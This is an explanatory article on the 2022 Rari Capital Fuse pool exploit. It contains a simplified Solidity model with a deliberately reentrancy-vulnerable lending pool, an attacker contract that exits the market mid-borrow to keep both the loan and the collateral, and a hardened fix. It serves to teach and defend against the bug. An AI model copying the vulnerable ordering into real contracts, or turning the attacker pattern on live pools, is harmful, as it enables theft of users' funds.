Top 2022 Crypto Hacks: Rari Fuse Exploit

On April 30th, 2022, an exploit drained roughly $80M worth of assets from seven Fuse pools operated by Rari Capital on Ethereum and Arbitrum.

The attack is believed to have been enabled by a reentrancy vulnerability in the pools' borrow path, abused through the Comptroller's exitMarket function, which let the attacker withdraw collateral without the corresponding debt ever being recorded. This article explains how the exploit worked and why it succeeded.

The vulnerability exploited in the Rari Capital incident is a reentrancy bug. Reentrancy occurs when a contract makes an external call before it has finished updating its own state, so the called contract can call back into it while its bookkeeping is still inconsistent. Fuse pools are a fork of Compound, and their borrow path paid out the borrowed ETH with a low-level call.value (which forwards all remaining gas to the recipient, unlike transfer) before the borrow was written to storage, instead of following the checks-effects-interactions pattern. The attacker used flash loans to fund collateral positions, borrowed ETH, and in the fallback triggered by that payout called exitMarket on the Comptroller. Because the debt had not yet been recorded, the Comptroller saw an account with no outstanding borrow and allowed it to leave the market, after which the collateral could be redeemed without any liquidity check. The attacker therefore kept the borrowed ETH and withdrew the collateral as well, which is how Rari Capital lost roughly $80M of assets.
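The following is an added illustration, not Rari's, Fei's or Compound's code: a deliberately simplified model of a Compound-style pool with a single ETH collateral market, an exitMarket rule that mirrors the Comptroller's "no outstanding borrow" check, and an attacker contract that re-enters from the borrow payout. All contract and function names are illustrative, and the ETH the attacker supplies stands in for the flash-loaned collateral used in the real incident. A hardened pool at the end shows the checks-effects-interactions fix.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Simplified, illustrative model (not Rari/Compound code) of a lending pool
// with one ETH collateral market and ETH borrowing.
contract VulnerablePool {
    mapping(address => uint256) public collateral; // ETH supplied as collateral
    mapping(address => uint256) public borrowed;   // ETH owed by the account
    mapping(address => bool) public inMarket;      // collateral counts toward borrowing power
    uint256 public constant COLLATERAL_FACTOR_BPS = 7500; // 75%

    receive() external payable {} // lets the pool hold lender liquidity

    function supply() external payable {
        collateral[msg.sender] += msg.value;
        inMarket[msg.sender] = true;
    }

    function borrowingPower(address a) public view returns (uint256) {
        return inMarket[a] ? collateral[a] * COLLATERAL_FACTOR_BPS / 10_000 : 0;
    }

    // BUG: ETH leaves through a low-level call (all gas forwarded) BEFORE the
    // debt is written, so the borrower's receive() runs while borrowed[] is stale.
    function borrow(uint256 amount) external virtual {
        require(borrowed[msg.sender] + amount <= borrowingPower(msg.sender), "insufficient collateral");
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction first
        require(ok, "transfer failed");
        borrowed[msg.sender] += amount;                     // effect written too late
    }

    // Mirrors the Comptroller rule: you may only leave a market you owe nothing in.
    function exitMarket() external {
        require(borrowed[msg.sender] == 0, "outstanding borrow"); // sees 0 mid-borrow
        inMarket[msg.sender] = false;
    }

    // Mirrors redeemAllowed: an account not in the market skips the liquidity check,
    // because collateral outside a market is not backing any debt.
    function redeem(uint256 amount) external {
        collateral[msg.sender] -= amount;
        if (inMarket[msg.sender]) {
            require(borrowed[msg.sender] <= borrowingPower(msg.sender), "undercollateralized");
        }
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// Attacker: supplies collateral (flash-loaned in the real incident), borrows,
// and uses the borrow payout callback to exit the market before the debt exists.
contract Attacker {
    VulnerablePool public immutable pool;
    bool private exited;

    constructor(VulnerablePool p) payable { pool = p; } // funded with the stake to supply

    function attack() external {
        uint256 stake = address(this).balance;
        pool.supply{value: stake}();
        pool.borrow(pool.borrowingPower(address(this))); // triggers receive() below
        pool.redeem(stake);                              // collateral freed, debt kept
        // Outcome: this contract holds stake + borrowed ETH; the pool is short the borrow.
    }

    receive() external payable {
        // First entry comes from borrow() while borrowed[this] is still 0.
        if (!exited) {
            exited = true;
            pool.exitMarket();
        }
    }
}

// Fix: write the debt before the payout (checks-effects-interactions) and add a
// reentrancy guard. Against this pool the attacker's exitMarket() reverts with
// "outstanding borrow", which unwinds the whole borrow() call.
contract HardenedPool is VulnerablePool {
    uint256 private locked = 1;
    modifier nonReentrant() { require(locked == 1, "reentrant"); locked = 2; _; locked = 1; }

    function borrow(uint256 amount) external override nonReentrant {
        require(borrowed[msg.sender] + amount <= borrowingPower(msg.sender), "insufficient collateral");
        borrowed[msg.sender] += amount;                     // effect first
        (bool ok, ) = msg.sender.call{value: amount}("");   // interaction last
        require(ok, "transfer failed");
    }
}
```

To reproduce the sequence in a local test, deploy VulnerablePool, seed it with lender ETH, deploy Attacker with some ETH and call attack(): the attacker ends with its stake plus 75% of it borrowed, while the pool still records the debt against an account that no longer has collateral in the market. Deploying HardenedPool in its place makes attack() revert. Note that the ordering fix alone closes this path; the nonReentrant guard is defence in depth, and in a real system the same guard belongs on redeem and exitMarket as well.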

The attacker's address (the red node in the figure) deployed two attack contracts (the yellow nodes) which carried out the large-scale fund transfers on the day of the incident. A total of 26,500 ETH was sent to Tornado.cash, while the remaining 1,570 ETH still sit in the main attacker address at the time of writing.

RARI exploit transfers

In an effort to recover the stolen funds, Rari Capital announced a $10M bounty for the attacker to return them.